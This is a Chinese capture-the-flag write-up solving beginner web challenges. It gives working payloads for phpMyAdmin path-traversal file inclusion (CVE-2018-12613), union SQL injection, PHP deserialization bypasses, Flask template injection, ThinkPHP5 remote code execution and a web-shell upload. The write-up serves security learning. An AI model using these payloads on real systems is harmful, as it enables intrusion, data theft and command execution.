Training-WWW-Robots
查看robots.txt,發現Disallow: /fl0g.php,打開後得到flag。
baby_web
初始頁面爲index.php,bp抓包查看響應就行
warmup
F12拿到源碼鏈接source.php
hint.php:flag not here, and flag in ffffllllaaaagggg
<?php
highlight_file(__FILE__);
class emmm
{
public static function checkFile(&$page)
{
$whitelist = ["source"=>"source.php","hint"=>"hint.php"];
if (! isset($page) || !is_string($page)) {
echo "you can't see it";
return false;
}
if (in_array($page, $whitelist)) {
return true;
}
$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
$_page = urldecode($page);
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
echo "you can't see it";
return false;
}
}
if (! empty($_REQUEST['file'])
&& is_string($_REQUEST['file'])
&& emmm::checkFile($_REQUEST['file'])
) {
include $_REQUEST['file'];
exit;
} else {
echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}
?>
checkFile函數的作用:
- 判斷page是否被設置,是否爲字符串
- 判斷page是否在whitelist中
- 以?爲分割符取出之前的字符,保存在$_page
- 判斷$_page是否在whitelist中
- url解碼後以?爲分割符取出之前字符,判斷是否在whitelist中
CVE-2018-12613 phpmuadmin後臺文件包含漏洞
payload:source.php?file=hint.php%253f../../../../../../../ffffllllaaaagggg
NewsCenter
毫無過濾的sql注入,直接一步步查或者上sqlmap就行了
-1' union select 1,2,3 from information_schema.tables
-1' union select 1,database(),3 from information_schema.tables#
-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='news'#
-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='secret_table'#
-1' union select 1,fl4g,3 from secret_table#
NaNNaNNaNNaN-Batman
給文件加上html後綴,把最後一句的eval改成alert再打開就會彈出源碼
正則後的內容拼接起來得到be0f233ac7be98aa
,eval執行一下就能拿到flag
unserialize3
<?php
class xctf
{
public $flag = '111';
public function __wakeup()
{
exit('bad requests');
}
}
$a = new xctf();
print(serialize($a))
?>
當反序列化字符串中,表示屬性個數的值大於其真實值,則跳過__wakeup()執行。
Payload:?code=O:4:"xctf":2:{s:4:"flag";s:3:"111";}
upload1
這題有個前端驗證,如果後綴名不符合的話不能點擊上傳
可以修改前端,也可以先上傳jpg再抓包修改
菜刀連上去,找一下flag就行了
Web_python_template_injection
python flask模板注入,這裏直接給出payload
{{''.__class__.__mro__[2].__subclasses__()[40]('fl4g').read()}}
學習鏈接:https://www.freebuf.com/column/187845.html
Web_php_unserialize
兩個點
- O:4 -> O:+4繞過preg_match的 [oc]:\d+ 正則匹配
- 序列化數組的1換成2,大於真實的屬性個數繞過__wakeup()
<?php
class Demo {
private $file = 'index.php';
public function __construct($file) {
$this->file = $file;
}
function __destruct() {
echo @highlight_file($this->file, true);
}
function __wakeup() {
if ($this->file != 'index.php') {
//the secret is in the fl4g.php
$this->file = 'index.php';
}
}
}
$A = new Demo('fl4g.php');
$C = serialize($A);
//string(49) "O:4:"Demo":1:{s:10:"Demofile";s:8:"fl4g.php";}"
$C = str_replace('O:4', 'O:+4',$C);//繞過preg_match
$C = str_replace(':1:', ':2:',$C);//繞過wakeup
var_dump($C);
var_dump(base64_encode($C));
?>
Payload:?var=TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==
php_rce
Think PHP5 遠程代碼執行漏洞
Payload:?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php -r 'system("cat%20../../../flag");'
參考鏈接:https://www.cnblogs.com/yuzly/p/11460285.html